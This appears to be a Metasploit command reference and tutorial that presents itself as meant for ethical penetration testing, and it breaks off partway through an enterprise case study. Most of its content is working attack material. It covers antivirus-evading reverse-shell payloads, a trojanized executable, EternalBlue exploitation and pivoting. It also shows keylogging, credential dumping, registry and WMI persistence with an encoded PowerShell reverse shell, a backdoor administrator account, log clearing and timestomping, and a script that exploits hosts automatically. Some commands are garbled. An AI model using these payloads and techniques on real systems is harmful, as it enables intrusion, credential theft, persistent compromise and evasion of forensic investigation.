# METASPLOIT FRAMEWORK MASTERY

ADVANCED TECHNIQUES AND COMMAND REFERENCE

msf6>

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#### Introduction

The Metasploit Framework represents one of the most powerful and versatile penetration testing platforms available to security professionals. While foundational usage is relatively straightforward, mastering Metasploit's extensive capabilities requires deep technical understanding of its architecture, module system, and advanced command syntax. This comprehensive guide explores sophisticated Metasploit techniques, from custom exploit development to advanced post-exploitation, providing security professionals with the technical knowledge needed to leverage the framework's full potential in ethical security assessments.

# **Metasploit Architecture and Core Components**

Understanding Metasploit's architecture is essential for advanced usage and customization.

#### Framework Components and Interaction Flow

Metasploit consists of several integrated components:

- 1. MSF Console (msfconsole): Primary interface for framework interaction
- 2. Module System: Categorized repositories of exploits, payloads, post modules, etc.
- 3. **REX Library**: Low-level tasks including networking and exploitation primitives
- 4. Framework Core: API that connects components and manages module execution
- 5. Framework Base: Provides common resources needed by modules
- 6. **msfdb**: Backend database for storing scan results, credentials, and hosts
- 7. **Plugins:** Extend functionality for specific tasks or integrations

The interaction flow follows this sequence:

```
[User Input] →
  [MSF Console] →
  [Framework Core] →
  [Module Selection] →
  [Options Configuration] →
  [Module Execution] →
  [Result Handling]
```

# **Database Schema and Workspace Architecture**

Metasploit's PostgreSQL database uses a structured schema for tracking penetration test data:

```
- purpose
  └─ info
msfdb services
  host_id (foreign key)
  port
  proto
  - state
  — name
  — info
msfdb_vulns
  host_id (foreign key)
  service_id (foreign key)
  — name
  - info
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msfdb notes
  ├─ host_id (foreign key)
  service_id (foreign key)
  — type
  — data
  └─ critical
```

Initialize and integrate the database:

```
msfdb init
msf6 > db_status
msf6 > workspace -a project_name
```

# **Module Tree and Classification System**

Metasploit organizes modules hierarchically:

```
modules/
  - auxiliary/ # Non-exploitation functionality
    -- scanner/
    -- admin/
    L_ dos/
  - encoders/ # Payload encoding to avoid detection
   - evasion/ # Specific anti-detection techniques
   - exploits/ # Categorized by target platform
    -- windows/
    linux/
    unix/
    L__ webapp/
   - nops/ # No-operation instructions
```

# **Advanced MSFconsole Usage Techniques**

#### **Command Chaining and Resource Scripts**

Resource scripts automate complex tasks by sequencing Metasploit commands:

```
# Initialize environment
workspace -a detailed_scan
setg RHOSTS 192.168.1.0/24
setg THREADS 10
# Run comprehensive port scan
use auxiliary/scanner/portscan/tcp
set PORTS 21,22,23,25,80,135,139,443,445,3389,5900,8080
# Service enumeration on discovered ports
use auxiliary/scanner/smb/smb_version
run
use auxiliary/scanner/http/http_version
run
use auxiliary/scanner/ssh/ssh version
run
use auxiliary/scanner/smb/smb_ms17_010
run
spool /tmp/scan_results.txt
hosts -c address,name,os_name,purpose
services -c port, proto, name, state
vulns
spool off
Execute the script within msfconsole:
msf6 > resource example scan.rc
```

#### **Advanced Workspace Management**

For complex engagements, implement structured workspace management:

```
msf6 > workspace -a recon
msf6 > workspace -a exploitation
msf6 > workspace -a post_exploitation
# Import data from external tools
msf6 > workspace recon
msf6 > db_import ~/nmap_scan.xml
# Export workspace data for reporting
msf6 > workspace exploitation
msf6 > db export -f xml ~/metasploit exploitation.xml
# Compare hosts across workspaces
msf6 > hosts -w recon -c address,name,os_name
msf6 > hosts -w exploitation -c address,name,os_name
# Merge workspace data
msf6 > workspace -a combined_assessment
msf6 > db_import ~/metasploit_recon.xml
msf6 > db import ~/metasploit exploitation.xml
```

#### **Global Variables and Environmental Customization**

Configure global settings to streamline operations:

```
# Set global variables for the session
msf6 > setg LHOST 192.168.1.100
msf6 > setg LPORT 4444
msf6 > setg VERBOSE true

# View all global variables
msf6 > getg

# Create persistent configuration
msf6 > save

# Create custom console prompt
msf6 > setg PROMPT "%red"+"msf6"+" %whi"+"${ACTIVE_WORKSPACE}"+" %ylw"+"> "
# Define custom aliases
msf6 > alias hs hosts
msf6 > alias sv services
```

#### **Comprehensive Search Techniques**

Master Metasploit's advanced search capabilities:

```
# Search by multiple criteria
msf6 > search name:windows type:exploit rank:excellent platform:windows

# Search with regular expressions
msf6 > search cve:2021 name:/smb|rdp|rce/ type:exploit

# Search for modules affecting specific service versions
msf6 > search apache name:2.4 type:exploit

# Search based on module reference ID
msf6 > search cve:2021-44228

# Search with advanced module metadata
msf6 > search disclosure:2021 type:exploit rank:excellent
```

# **Advanced Exploitation Techniques**

#### **Payload Generation and Encoding Chains**

Create sophisticated payloads using multiple encoders:

```
# Generate a multi-encoded payload
msf6 > use payload/windows/meterpreter/reverse_https
msf6 payload(windows/meterpreter/reverse_https) > set LHOST 192.168.1.100
msf6 payload(windows/meterpreter/reverse_https) > set LPORT 443
msf6 payload(windows/meterpreter/reverse_https) > generate -e
x86/shikata_ga_nai -i 10 -t exe -f encoded_payload.exe
# Chain multiple encoders with custom architecture
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443
 -e x86/shikata_ga_nai -i 5 \
 -e x86/call4_dword_xor -i 3 \
 -e x86/countdown -i 2 \
 -f exe -o multi_encoded_payload.exe
# Use the template option for payload embedding
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443
 -e x86/shikata_ga_nai -i 8 \
 -x /path/to/legitimate.exe \
```

```
-f exe -o trojanized_app.exe
```

#### **Exploit Customization and Targeting**

Modify exploits for specific target environments:

```
# Advanced options for exploit customization
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show advanced

# Set precise targeting options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set GroomAllocations 12
msf6 exploit(windows/smb/ms17_010_eternalblue) > set GroomDelta 5
msf6 exploit(windows/smb/ms17_010_eternalblue) > set VerifyArch false
msf6 exploit(windows/smb/ms17_010_eternalblue) > set VerifyTarget false
msf6 exploit(windows/smb/ms17_010_eternalblue) > set MaxExploitAttempts 3
msf6 exploit(windows/smb/ms17_010_eternalblue) > set ProcessName lsass.exe
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
```

#### **Session Management and Routing**

Implement advanced session handling for complex networks:

```
# List all active sessions
msf6 > sessions -1

# Establish routes through compromised hosts
msf6 > sessions -i 1
meterpreter > run autoroute -s 10.10.0.0/16

# Alternative method for routing
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 10.10.0.0
msf6 post(multi/manage/autoroute) > set NETMASK 255.255.0.0
msf6 post(multi/manage/autoroute) > run

# View established routes
msf6 > route print

# Create a SOCKS proxy for pivoting
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set VERSION 5
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > run -j

# Configure local tools to use the proxy
```

```
# Example proxychains.conf configuration:
# socks5 127.0.0.1 1080
```

#### **Exploit Staging and Payload Handlers**

Configure advanced handlers for payload management:

```
# Set up persistent handler with advanced options
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST 192.168.1.100
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > set ExitOnSession false
msf6 exploit(multi/handler) > set SessionCommunicationTimeout 300
msf6 exploit(multi/handler) > set SessionRetryTotal 3600
msf6 exploit(multi/handler) > set SessionRetryWait 10
msf6 exploit(multi/handler) > set HandlerSSLCert /path/to/cert.pem
msf6 exploit(multi/handler) > exploit -j
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set StageEncoder x86/shikata ga nai
msf6 exploit(multi/handler) > set EnableStageEncoding true
msf6 exploit(multi/handler) > set StageEncodingFallback false
msf6 exploit(multi/handler) > exploit
```

# **Meterpreter Advanced Techniques**

#### **Advanced Process Migration and Injection**

Optimize Meterpreter persistence through strategic process migration:

```
# View current process information
meterpreter > ps

# Migrate to a specific process by ID
meterpreter > migrate 1234

# Find and migrate to a stable system process
meterpreter > run post/windows/manage/migrate

# Advanced migration with architecture specification
meterpreter > migrate -P explorer.exe -A x64

# Memory injection techniques
meterpreter > run post/windows/manage/reflective_dll_inject \
```

```
PROCESS=explorer.exe \
PATH=/path/to/payload.dll

# Execute shellcode in a remote process
meterpreter > execute -H -i -c -m -d notepad.exe -f /path/to/shellcode.bin
```

#### **Comprehensive Privilege Escalation**

Automate privilege escalation with advanced techniques:

```
# Automated privilege escalation checks
meterpreter > run post/multi/recon/local_exploit_suggester

# UAC bypass techniques
meterpreter > run post/windows/escalate/bypassuac
meterpreter > getsystem -t 3

# Token duplication and impersonation
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "DOMAIN\\Administrator"

# Persistent elevated access
meterpreter > run persistence -A -L C:\\Windows\\Temp -X -i 60 -p 443 -r
192.168.1.100
```

#### **Advanced Filesystem and Registry Manipulation**

Perform sophisticated system modifications:

```
# Mount remote shares for data exfiltration
meterpreter > use auxiliary/admin/smb/psexec_command
meterpreter > run post/windows/manage/mount
meterpreter > upload /tools/advanced_toolkit.exe C:\\Windows\\Temp

# Registry operations for persistence
meterpreter > reg enumkey -k
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter > reg setval -k
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Backdoor -d
'C:\\Windows\\Temp\\payload.exe'
meterpreter > reg queryval -k
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Backdoor

# Timestomp to evade forensic analysis
meterpreter > timestomp C:\\Windows\\Temp\\payload.exe -f
C:\\Windows\\explorer.exe
```

#### **Network and Service Manipulation**

Configure network settings and services from within Meterpreter:

```
# Port forwarding for internal service access
meterpreter > portfwd add -1 8080 -p 80 -r 10.10.10.100

# ARP scanning from compromised host
meterpreter > run post/multi/gather/ping_sweep RHOSTS=10.10.10.0/24

# Manipulate Windows Firewall
meterpreter > run post/windows/manage/enable_rdp
meterpreter > run post/windows/manage/enable_psexec

# Keylogging and surveillance
meterpreter > keyscan_start
meterpreter > run post/windows/capture/keylog_recorder

# Extract saved credentials
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/firefox_creds
```

# **Post-Exploitation Framework**

#### **Automated Intelligence Gathering**

```
Systematically collect valuable information from compromised systems:
# Comprehensive host enumeration
meterpreter > run post/multi/gather/env
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum services
meterpreter > run post/windows/gather/enum_patches
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/enum domains
# Execute multiple post modules in sequence
msf6 > resource post_exploitation_windows.rc
use post/windows/gather/enum_logged_on_users
set SESSION 1
run
use post/windows/gather/enum_domain_tokens
set SESSION 1
run
```

```
use post/windows/gather/credentials/domain_hashdump
set SESSION 1
run
```

#### **Lateral Movement Techniques**

Expand access throughout the network environment:

```
# WMI-based lateral movement
msf6 > use exploit/windows/local/wmi
msf6 exploit(windows/local/wmi) > set SESSION 1
msf6 exploit(windows/local/wmi) > set SMBUSER Administrator
msf6 exploit(windows/local/wmi) > set SMBPASS P@ssw0rd
msf6 exploit(windows/local/wmi) > set SMBDOMAIN WORKGROUP
msf6 exploit(windows/local/wmi) > set RHOSTS 10.10.10.10
msf6 exploit(windows/local/wmi) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/wmi) > set LHOST 192.168.1.100
msf6 exploit(windows/local/wmi) > exploit
# PsExec with captured credentials
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.10-20
msf6 exploit(windows/smb/psexec) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set LHOST 192.168.1.100
msf6 exploit(windows/smb/psexec) > exploit
# Token-based access using Incognito
meterpreter > load incognito
meterpreter > list_tokens -g
meterpreter > steal_token 1234
meterpreter > execute -f cmd.exe -i -t -c -H
```

#### **Persistent Access Implementation**

Establish sophisticated persistence mechanisms:

```
# Registry-based persistence
meterpreter > run post/windows/manage/persistence_exe \
   STARTUP=SERVICE \
   REXENAME=system_service.exe \
   REXEPATH=C:\\Windows\\System32 \
```

```
OPTIONS="-e x86/shikata_ga_nai -i 10 -p windows/meterpreter/reverse_https
LHOST=192.168.1.100 LPORT=443"
# WMI event subscription persistence
meterpreter > run post/windows/manage/wmi eventfilter \
 SESSION=1 \
 EVENTFILTER_NAME=SecurityCheck \
 OUERYLANGUAGE=WOL \
 QUERY="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour=7" \
 CONSUMER TYPE=CommandLine \
 CONSUMER NAME=SecurityChecker \
COMMAND_LINE_TEMPLATE="%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powe
rshell.exe -NoP -NonI -W Hidden -c \"IEX
([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64Strin
g('JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0AL
gBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxA
DYAOAAUADEALgAxADAAMAANACWANAAOADQAMWApADsAJABzAHQAcgBlAGEAbQAgADOAIAAkAGMAb
ABpAGUAbgB0AC4ARwB1AHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdAB1AFsAXQBdACQAYgB5A
HQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAa
QAgAD0AIAAKAHMAdAByAGUAYOBtAC4AUgB1AGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAKA
GIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgB1ACAAMAApAHsAOwAkAGQAYQB0AGEAI
AA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcAB1AE4AYQBtAGUAIABTAHkAcwB0A
GUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAc
gBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9A
CAAKABPAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBPAG4AZ
wAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgA
CCAUABTACAAJWAgACsAIAAOAHAAdWBkACkALgBQAGEAdABOACAAKWAgACcAPgAgACcAOwAkAHMAZ
QBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdAB1AHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBA
FMAQWBJAEkAKQAUAEcAZQB0AEIAeQB0AGUAcwAoACQAcwB1AG4AZABiAGEAYwBrADIAKQA7ACQAc
wB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuA
GQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAK
QB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA')))\" \r\n"
# Backdoored Windows service
meterpreter > run post/windows/manage/backdoor_add_user \
 USERNAME=maintenance \
 PASSWORD=Password123! \
 ADDTOGROUP=Administrators
```

#### **Evidence Removal and Anti-forensics**

Implement anti-forensic techniques:

```
# Clear Windows event logs
meterpreter > clearev
```

```
# Remove artifacts and logs
meterpreter > run post/windows/manage/delete_logs

# Securely delete files with multiple passes
meterpreter > run post/windows/manage/secure_delete \
   FILES="C:\\Temp\\attack_notes.txt,C:\\Temp\\passwords.txt" \
   PASSES=7 \
   ZERO=true

# Disable Windows Defender and security tools
meterpreter > run post/windows/manage/killav
meterpreter > run post/windows/manage/disable_uac
```

# **Custom Module Development**

#### **Exploit Module Development**

```
Create custom exploit modules for specific vulnerabilities:
# Save to ~/.msf4/modules/exploits/windows/http/my custom exploit.rb
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote</pre>
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpClient
 def initialize(info = {})
   super(update_info(info,
                      => 'Custom HTTP Buffer Overflow',
      'Name'
      'Description'
                     => %q{
       This is a custom exploit for a buffer overflow vulnerability
       in a hypothetical HTTP server.
      },
      'Author'
                     => [ 'Security Researcher' ],
      'License'
                      => MSF LICENSE,
      'References' => [
      [ 'CVE', '2021-XXXXX' ],
       [ 'URL', 'https://example.com/vulnerability-details' ]
      ],
      'Privileged'
                     => false,
      'Platform'
                     => 'win',
      'Targets'
                      => [
       [ 'Windows 10 x64',
            'Ret' => 0x41424344,
            'Offset' => 2048
```

```
}
        ]
      'DefaultTarget' => 0,
      'DisclosureDate' => '2021-01-01'
    register_options(
        OptString.new('TARGETURI', [ true, 'The target URI', '/' ]),
        OptInt.new('CUSTOM_OPTION', [ true, 'Custom option for exploit', 1
])
      ], self.class
 end
 def check
   # Implement vulnerability check logic
   res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'version')
    })
    if res && res.code == 200 && res.body =~ /Version: 1\.2\.3/
     return Exploit::CheckCode::Appears
   end
   return Exploit::CheckCode::Safe
 end
 def exploit
   print_status("Exploiting target #{target.name}...")
   buf = rand_text_alpha(target['Offset'])
   buf << [target.ret].pack('V')</pre>
   buf << rand_text_alpha(16) # Nop sled</pre>
   buf << payload.encoded</pre>
   res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'vulnerable'),
      'vars_post' => {
        'param' => buf
      }
    })
```

```
handler
end
end
```

Load the custom module:

```
msf6 > reload_all
msf6 > use exploit/windows/http/my_custom_exploit
msf6 exploit(windows/http/my_custom_exploit) > info
```

#### **Post-Exploitation Module Development**

Create specialized post-exploitation modules:

```
# Example custom post module: my_custom_gather.rb
# Save to ~/.msf4/modules/post/windows/gather/my_custom_gather.rb
require 'msf/core'
class MetasploitModule < Msf::Post</pre>
 include Msf::Post::Windows::Registry
 include Msf::Post::Windows::Priv
 include Msf::Post::File
 def initialize(info = {})
   super(update_info(info,
      'Name'
                     => 'Custom Credential Gatherer',
      'Description' => %q{
       This module extracts credentials from a custom application.
      },
      'License'
                    => MSF_LICENSE,
      'Author'
                    => [ 'Security Researcher' ],
                    => [ 'win' ],
      'Platform'
      'SessionTypes' => [ 'meterpreter' ]
    ))
    register_options(
        OptString.new('APP_PATH', [ true, 'Path to the application',
'C:\\Program Files\\CustomApp' ])
      ], self.class
 end
 def run
   if !is admin?
```

```
print_warning("Not running as admin, some functions may fail")
else
  print_good("Running as admin")
app_path = datastore['APP_PATH']
print_status("Searching for credentials in #{app_path}")
if !directory?(app path)
  print error("Application path not found: #{app path}")
  return
end
# Look for config files
config_files = dir(app_path + "\\*.config")
print_status("Found #{config_files.length} config files")
# Extract from each file
config_files.each do |file|
  print_status("Processing #{file}")
  content = read_file(file)
  # Look for credentials in various formats
  if content =~ /<connectionString>(.*?)<\/connectionString>/i
    connection string = $1
    print_good("Found connection string: #{connection_string}")
    # Extract username and password
    if connection_string =~ /User ID=([^;]+);.*Password=([^;]+)/i
     username = $1
      password = $2
      print_good("Extracted credentials: #{username}:#{password}")
      store_loot(
        "custom.app.creds",
        "text/plain",
        session,
        "#{username}:#{password}",
        "credentials.txt",
        "Custom Application Credentials"
      )
    end
  end
end
```

```
begin
      app key = "HKLM\\SOFTWARE\\CustomApp"
     license_key = registry_getvaldata(app_key, "LicenseKey")
     if license key
        print good("Found license key: #{license key}")
   rescue Rex::Post::Meterpreter::RequestError => e
     print_error("Error accessing registry: #{e.message}")
   end
   print_status("Credential gathering complete")
end
Load and use the custom post module:
msf6 > reload_all
msf6 > use post/windows/gather/my_custom_gather
msf6 post(windows/gather/my_custom_gather) > show options
msf6 post(windows/gather/my_custom_gather) > set SESSION 1
msf6 post(windows/gather/my_custom_gather) > run
```

## **Auxiliary Module Development**

Create a custom scanner or utility module:

```
require 'msf/core'
class MetasploitModule < Msf::Auxiliary</pre>
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::Scanner
 include Msf::Auxiliary::Report
 def initialize(info = {})
    super(update_info(info,
      'Name'
                       => 'Custom HTTP Vulnerability Scanner',
      'Description'
                       => %q{
       This module scans for a specific vulnerability in web applications.
      },
      'Author'
                       => [ 'Security Researcher' ],
      'License'
                       => MSF_LICENSE,
      'References'
                       => [
        [ 'CVE', '2021-XXXXX' ],
        [ 'URL', 'https://example.com/vulnerability-details' ]
      ]
    ))
```

```
register_options(
       OptString.new('TARGETURI', [ true, 'The base path to the vulnerable
application', '/' ]),
       OptString.new('CUSTOM_HEADER', [ false, 'Custom header to add to
requests', nil ])
     ], self.class
 end
 def run host(ip)
   uri = normalize_uri(target_uri.path, 'vulnerable_endpoint')
   # Prepare headers
   headers = {}
   if datastore['CUSTOM_HEADER']
     key, value = datastore['CUSTOM HEADER'].split(':', 2)
     headers[key] = value
   end
   # Send probe request
   print_status("Scanning #{ip} for vulnerability...")
   begin
     res = send request cgi({
       'method' => 'GET',
        'uri' => uri,
       'headers' => headers
     })
     # Check the response
     if res && res.code == 200
       if res.body =~ /vulnerable_pattern/
          print_good("#{ip} appears to be vulnerable!")
         # Report the vulnerability
         report_vuln(
            :host => ip,
           :port => rport,
            :proto => 'tcp',
            :name => "Custom Application Vulnerability",
            :info => "The application at #{full_uri} appears vulnerable
based on response pattern",
            :refs => self.references
```

```
path = store loot(
            'custom.http.vulnerability',
            'text/html',
            ip,
            res.body,
            "custom_vuln_#{ip}.html",
            "Custom Application Vulnerability Response"
          print_good("Response saved to: #{path}")
        else
          print status("#{ip} does not appear to be vulnerable")
        end
      else
        print_error("Error communicating with #{ip}: #{res ? res.code : 'No
response'}")
      end
   rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable,
      print_error("Connection failed to #{ip}")
   rescue => e
      print_error("Error scanning #{ip}: #{e.message}")
   end
 end
end
```

# **Advanced Scripting and Automation**

## **Ruby Console Integration**

Leverage the Metasploit Ruby console (msf-irb) for advanced scripting:

```
# Launch Metasploit's Ruby console
msf6 > irb

# Access framework components
>> framework.modules.exploits.keys
>> framework.sessions.each_pair {|id, session| puts "Session #{id}:
#{session.info}"}

# Create and execute modules programmatically
>> exploit =
framework.modules.create("exploit/windows/smb/ms17_010_eternalblue")
>> exploit.datastore['RHOSTS'] = '192.168.1.10'
>> exploit.datastore['PAYLOAD'] = 'windows/x64/meterpreter/reverse_tcp'
>> exploit.datastore['LHOST'] = '192.168.1.100'
>> exploit.execute
```

#### **API Integration and External Tool Chaining**

Integrate Metasploit with external tools via the Remote API:

```
require 'msfrpc-client'
require 'json'
# Connect to MSF RPC server
client = Msf::RPC::Client.new(
 :host => '127.0.0.1',
 :port => 55553,
 :uri => '/api/',
 :ssl => true,
 :username => 'msf',
 :password => 'password'
auth = client.call('auth.login', 'msf', 'password')
token = auth['token']
# Create a workspace
client.call('db.add_workspace', token, 'api_automation')
# Import Nmap results
nmap_data = File.read('/tmp/nmap_scan.xml')
client.call('db.import_data', token, {
  'workspace' => 'api_automation',
  'data' => nmap data,
  'format' => 'nmap'
})
# Get hosts from the database
hosts = client.call('db.hosts', token, {'workspace' => 'api_automation'})
puts "Discovered hosts: #{hosts['hosts'].map{|h| h['address']}.join(', ')}"
hosts['hosts'].each do |host|
 # Skip hosts without SMB open
 has_smb = client.call('db.services', token, {
    'workspace' => 'api_automation',
    'hosts' => [host['address']],
    'ports' => [445]
 })
 next if has_smb['services'].empty?
```

```
puts "Exploiting #{host['address']} with EternalBlue..."
 # Create exploit job
 res = client.call('module.execute', token, 'exploit',
'windows/smb/ms17 010 eternalblue', {
    'RHOSTS' => host['address'],
    'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
    'LHOST' => '192.168.1.100'
 })
 puts "Job ID: #{res['job id']}"
end
# Get session information
sleep 30 # Wait for exploits to finish
sessions = client.call('session.list', token)
puts "Active sessions: #{sessions.keys.join(', ')}"
sessions.each do |id, session|
 if session['type'] == 'meterpreter'
   puts "Running commands on session #{id}..."
   res = client.call('session.meterpreter run single', token, id,
'sysinfo')
   puts "System info: #{res['result']}"
   # Execute shell command
   res = client.call('session.meterpreter run single', token, id, 'shell
   puts "User: #{res['result'].strip}"
 end
end
Execute the automation script:
# Start MSF RPC server
msfrpcd -U msf -P password -a 127.0.0.1 -p 55553 -S
# Run automation script
ruby api_automation.rb
```

# **Custom Exploitation Frameworks**

Build advanced attack chains for complex environments:

```
# Example attack chain script (attack_chain.rb)
require 'msfrpc-client'
```

```
require 'logger'
# Configure logging
logger = Logger.new('attack_chain.log')
logger.level = Logger::INFO
# Connect to MSF RPC server
def connect to msf
 client = Msf::RPC::Client.new(
   :host => '127.0.0.1',
   :port => 55553,
   :uri => '/api/',
   :ssl => true,
   :username => 'msf',
   :password => 'password'
 auth = client.call('auth.login', 'msf', 'password')
 return client, auth['token']
end
# Phase 1: Exploitation
def initial_exploitation(client, token, target)
 logger.info("Beginning initial exploitation against #{target}")
 logger.info("Attempting EternalBlue against #{target}")
 res = client.call('module.execute', token, 'exploit',
'windows/smb/ms17 010 eternalblue', {
    'RHOSTS' => target,
   'PAYLOAD' => 'windows/x64/meterpreter/reverse tcp',
   'LHOST' => '192.168.1.100'
 })
 job_id = res['job_id']
 session_id = nil
 20.times do
   sleep 5
   sessions = client.call('session.list', token)
   # Find session created by our job
   sessions.each do |id, session|
     if session['via_exploit'] == 'windows/smb/ms17_010_eternalblue' &&
        session['target_host'] == target
       session_id = id
```

```
break
     end
   end
   break if session id
 end
 if session id.nil?
   logger.error("Failed to get session with EternalBlue")
   logger.info("Attempting PSExec against #{target}")
 else
   logger.info("Got session #{session_id}")
   return session id
 end
end
# Phase 2: Privilege Escalation
def privilege_escalation(client, token, session_id)
 logger.info("Attempting privilege escalation on session #{session_id}")
 # Check current privileges
 res = client.call('session.meterpreter_run_single', token, session_id,
'getuid')
 logger.info("Current user: #{res['result'].strip}")
 res = client.call('session.meterpreter_run_single', token, session_id,
'getsystem')
 if res['result'] =~ /Got system/
   logger.info("Successfully elevated to SYSTEM")
   return true
 else
    logger.warning("Failed to get SYSTEM directly, trying alternative
techniques")
   # Try local exploit suggester
   res = client.call('module.execute', token, 'post',
'multi/recon/local_exploit_suggester', {
      'SESSION' => session_id
   })
   # ... implement parsing and exploitation of suggested vulnerabilities
   return false
 end
```

```
end
# Phase 3: Lateral Movement
def lateral_movement(client, token, session_id)
 logger.info("Beginning lateral movement from session #{session id}")
 # Discover network
 client.call('session.meterpreter run single', token, session id, 'run
autoroute -s 192.168.1.0/24')
 client.call('session.meterpreter_run_single', token, session_id, 'run
post/multi/gather/ping sweep RHOSTS=192.168.1.0/24')
 # Dump credentials
 client.call('session.meterpreter_run_single', token, session_id, 'load
kiwi')
 client.call('session.meterpreter_run_single', token, session_id,
'creds_all')
 # ... implement credential parsing and using them for lateral movement
 # Start SMB scanner with gathered credentials
end
# Phase 4: Data Collection
def data collection(client, token, session id)
 logger.info("Gathering sensitive data from session #{session_id}")
 # Run various data collection modules
 modules = [
    'post/windows/gather/enum domain tokens',
    'post/windows/gather/credentials/domain hashdump',
    'post/windows/gather/smart_hashdump',
    'post/windows/gather/enum_shares',
    'post/windows/gather/enum snmp'
 ]
 modules.each do |mod|
   logger.info("Running #{mod}")
   client.call('module.execute', token, 'post', mod, {
      'SESSION' => session_id
   })
 end
 # Search for sensitive files
 patterns = ['password', 'confidential', 'secret', 'credentials']
 client.call('session.meterpreter_run_single', token, session_id,
    "search -f *.txt -d C:\\Users\\ #{patterns.join(' ')}")
```

```
end
# Main execution
begin
 client, token = connect_to_msf
 target = '192.168.1.10'
 session_id = initial_exploitation(client, token, target)
 if session id
   if privilege_escalation(client, token, session_id)
     lateral_movement(client, token, session_id)
   end
   data_collection(client, token, session_id)
 end
rescue => e
 logger.error("Error during execution: #{e.message}")
 logger.error(e.backtrace.join("\n"))
end
```

#### **Case Studies and Practical Scenarios**

#### **Enterprise Network Penetration Testing**

This scenario demonstrates a methodical approach for assessing corporate networks:

```
# Phase 1: Workspace setup and organization
msf6 > workspace -a corporate_assessment
msf6 > setg RHOSTS 10.0.0.0/8
msf6 > setg THREADS 50
# Phase 2: Initial reconnaissance
msf6 > use auxiliary/scanner/discovery/udp_sweep
msf6 auxiliary(scanner/discovery/udp_sweep) > run
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > run
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > run
# Phase 3: Targeted vulnerability scanning
msf6 > use auxiliary/scanner/smb/smb ms17 010
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
msf6 > use auxiliary/scanner/http/webdav_scanner
msf6 auxiliary(scanner/http/webdav_scanner) > run
```

```
# Phase 4: Exploitation of critical vulnerabilities
msf6 > use exploit/windows/smb/ms17 010 eternalblue
msf6 exploit(windows/smb/ms17 010 eternalblue) > set PAYLOAD
windows/x64/meterpreter/reverse_https
msf6 exploit(windows/smb/ms17 010 eternalblue) > set LHOST 192.168.1.100
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.0.1.15
